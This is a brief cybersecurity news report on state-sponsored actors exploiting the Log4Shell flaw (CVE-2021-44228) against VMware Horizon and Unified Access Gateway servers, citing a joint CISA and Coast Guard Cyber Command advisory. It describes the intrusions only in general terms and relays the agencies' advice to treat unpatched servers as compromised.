State-sponsored hacking groups and other threat actors have been exploiting the Log4Shell remote code execution flaw, tracked as CVE-2021-44228, in attacks against VMware servers, according to BleepingComputer.
VMware Horizon and Unified Access Gateway servers have been compromised with Log4Shell in an effort to obtain initial network access, which would then be followed by malware delivery that would facilitate additional payload distribution and sensitive data exfiltration, a joint advisory from the Cybersecurity and Infrastructure Security Agency and U.S. Coast Guard Cyber Command warned.
"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data," said the advisory. Both agencies urged organizations with still unpatched VMware servers to consider them compromised and commence threat hunting efforts.